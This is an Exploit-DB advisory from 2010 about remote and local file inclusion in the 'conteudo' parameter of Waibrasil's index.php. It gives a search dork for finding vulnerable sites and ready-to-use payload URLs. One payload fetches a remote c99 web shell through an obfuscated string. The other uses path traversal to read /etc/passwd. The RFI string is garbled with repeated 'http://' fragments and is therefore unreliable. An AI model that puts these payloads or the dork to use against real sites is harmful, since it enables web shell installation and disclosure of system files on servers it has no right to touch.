Waibrasil - Local/Remote File Inclusion

EDB-ID:

12562

CVE:

N/A


Author:

eXeSoul

Type:

webapps


Platform:

PHP

Date:

2010-05-10


# Title: Waibrasil Remote / Local File Inclusion
# Date:  10-05-2010
# Author: eXeSoul
# Vendor: www.waibrasil.com.br
# category: RFI / LFI
# Version: webapps
# Tested on: Apcahe/Unix
# VCE: ()
# Code : hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://server/c99.txt? 
# Dork :  inurl:"index.php?conteudo="
-----------------------------------------------------------------------------------
##########################################################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#
#Thanks:I-H Guru ,SaiSatish,FB1H2S,Micr0,Dark_Blue,c00lt04d,X__HMG,Th3 RDXâ„¢,X_Cobra_X,AK-47
#
#Shoutz: Notieboi,r45c4l,Yash,M.R SK,Hacker Cyclone,Neo Hacker,S1layer
#
#Catch us at www.andhrahackers.com or www.teamicw.in
##########################################################################################################

Local File Inclusion

Dork:- inurl:"index.php?conteudo="


Exploited Link:- http://[site].com/index.php?conteudo=[exploit]


exploit:-  hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://server/c99.txt?

live demo :- http://[site]/index.php?conteudo=hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://server/c99.txt?



Dork:  inurl:"index.php?conteudo="

Exploit: www.Site.com/index.php?conteudo=[LFI]

Live Demo: http://[site]/index.php?conteudo=../../../../etc/passwd


# eXeSoul  mailto: exe.soul@live.com

# JAY HIND.!! JAY SHREE RAM.!! JAY SHREE KRISHA.!! JAY MAHADEV.!!

# eXploit-db.com [10-5-2010]